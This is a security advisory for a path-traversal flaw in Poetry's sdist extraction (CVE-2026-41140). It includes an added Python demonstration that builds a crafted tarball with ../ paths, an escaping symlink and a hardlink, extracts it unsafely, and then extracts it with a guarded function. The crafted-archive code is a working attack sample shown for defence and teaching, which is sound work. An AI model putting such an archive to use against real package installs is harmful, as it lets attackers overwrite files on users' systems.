PT-2026-34538 · PyPI · Poetry
Published 2026-04-22 · Updated 2026-05-26
CVE-2026-41140
CVSS v4.0
0.6 (Low)
Vector
AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Name of the Vulnerable Software and Affected Versions
Poetry versions prior to 2.3.4
Description
The extractall() helper in src/poetry/utils/helpers.py extracts sdist tarballs without path traversal protection on Python versions where the tarfile "data" extraction filter is unavailable, specifically Python 3.10.0 through 3.10.12 and 3.11.0 through 3.11.4. A crafted sdist whose tar members use ../ path components, symlinks that point outside the extraction directory, or hardlinks to files outside it lets an attacker write arbitrary files outside the intended extraction directory. The vulnerable code path is reached during metadata resolution and when Poetry builds a package from an sdist.
Recommendations
Update Poetry to version 2.3.4 or newer.
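To make the three member kinds named in the description concrete, the following is an added example; it is not Poetry's code and not the fix this advisory refers to. It builds an in-memory tarball shaped like an sdist that carries a ../ path, a symlink pointing above the extraction root followed by a file written through it, and a hardlink to a file outside the root followed by a write through that. It then extracts the archive once with no filter, reproducing the behaviour the description attributes to the affected interpreters, and once through a guard that uses tarfile's data filter when the interpreter provides one and otherwise checks each member's resolved destination immediately before extracting it. The package name, file names and contents are constructed, and run_demo() is a hypothetical driver that keeps everything inside a temporary directory.

```python
# Added example, not Poetry's code; the package, file and link names below are all constructed.
from __future__ import annotations

import io
import os
import tarfile
import tempfile
from pathlib import Path


def _add(tar, name, text="", *, linkname="", kind=tarfile.REGTYPE):
    """Add one member; tarfile stores the name verbatim (addfile() does not normalise it)."""
    info = tarfile.TarInfo(name)
    info.type, info.linkname = kind, linkname
    data = text.encode()
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data) if data else None)


def build_crafted_sdist() -> bytes:
    """Constructed sample. Symlink targets resolve from the member's own directory, hardlink
    targets from the extraction root, which is why the two link targets below differ."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        _add(tar, "pkg-1.0/PKG-INFO", "Name: pkg\nVersion: 1.0\n")                # benign metadata
        _add(tar, "pkg-1.0/../../evil.txt", "pwned\n")                             # direct ../ traversal
        _add(tar, "pkg-1.0/link", linkname="../../", kind=tarfile.SYMTYPE)        # symlink above the root,
        _add(tar, "pkg-1.0/link/evil2.txt", "pwned\n")                             #   then a write through it
        _add(tar, "pkg-1.0/hl", linkname="../outside.txt", kind=tarfile.LNKTYPE)  # hardlink to an outside file,
        _add(tar, "pkg-1.0/hl", "pwned\n")                                         #   then a write through it
    return buf.getvalue()


def unsafe_extractall(data: bytes, dest: str) -> None:
    """The unfiltered extraction the advisory describes: every member is written as-is."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        if hasattr(tarfile, "data_filter"):
            tar.extractall(dest, filter="fully_trusted")  # opt back into the old behaviour
        else:
            tar.extractall(dest)                           # no filter exists to apply


def _inside(dest: str, candidate: str) -> bool:
    dest, candidate = os.path.realpath(dest), os.path.realpath(candidate)
    return os.path.commonpath([dest, candidate]) == dest  # symlinks already on disk are resolved


def audit_member(member: tarfile.TarInfo, dest: str) -> str | None:
    """Reason to reject `member`, or None. Approximates the data filter's containment checks only."""
    target = os.path.join(dest, member.name)
    if not _inside(dest, target):
        return "member path escapes destination"
    if member.issym() and not _inside(dest, os.path.join(os.path.dirname(target), member.linkname)):
        return "symlink target escapes destination"
    if member.islnk() and not _inside(dest, os.path.join(dest, member.linkname)):
        return "hardlink target escapes destination"
    return None


def safe_extractall(data: bytes, dest: str) -> list[str]:
    """Extract into `dest`, skipping hostile members; returns their names."""
    skipped: list[str] = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        if hasattr(tarfile, "data_filter"):  # interpreters that ship PEP 706 extraction filters
            def _filter(member: tarfile.TarInfo, path: str) -> tarfile.TarInfo | None:
                try:
                    return tarfile.data_filter(member, path)
                except tarfile.FilterError:
                    skipped.append(member.name)  # returning None makes extractall() skip it
                    return None
            tar.extractall(dest, filter=_filter)
        else:                                # the interpreters this advisory is about
            for member in tar.getmembers():  # checked right before extraction, not in one pre-pass
                if audit_member(member, dest):
                    skipped.append(member.name)
                    continue
                tar.extract(member, dest)
    return skipped


def run_demo() -> dict:
    """Extract the crafted archive both ways inside a temp dir and report where writes landed."""
    data = build_crafted_sdist()
    with tempfile.TemporaryDirectory() as tmp:
        unsafe_root, safe_root = os.path.join(tmp, "unsafe"), os.path.join(tmp, "safe")
        os.makedirs(unsafe_root)
        victim = Path(unsafe_root, "outside.txt")  # the hardlink's target, one level above dest
        victim.write_text("original\n")
        unsafe_extractall(data, os.path.join(unsafe_root, "dest"))
        dest = os.path.join(safe_root, "dest")
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
            audit = [m.name for m in tar.getmembers() if audit_member(m, dest)]  # static pre-scan
        skipped = safe_extractall(data, dest)
        extracted = sorted(os.path.relpath(os.path.join(root, f), dest).replace(os.sep, "/")
                           for root, _, files in os.walk(dest) for f in files)
        beside = lambda root: sorted(f for f in os.listdir(root) if f != "dest")  # escaped writes
        return {"unsafe_beside_dest": beside(unsafe_root), "victim_after": victim.read_text(),
                "audit": audit, "skipped": skipped,
                "safe_extracted": extracted, "safe_beside_dest": beside(safe_root)}
```

Running run_demo() shows the two outcomes side by side: the unfiltered extraction drops evil.txt and evil2.txt beside the destination directory and rewrites outside.txt through the hardlink, while the guarded extraction skips exactly the three path-or-link members and places the remaining files inside the destination. The fallback checks each member right before extracting it rather than in a single lexical pre-pass: if a symlink had been created by an earlier member it would already be on disk, and realpath() would expose a later write through it, which a pre-pass over the member list alone cannot see. The audit_member() check is an approximation of the stdlib data filter's containment rules for this demonstration, not a replacement for it; where the interpreter offers the filter, use the filter.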
Fix
Weakness Enumeration
Path traversal
Related Identifiers
Affected Products
Poetry
RED OS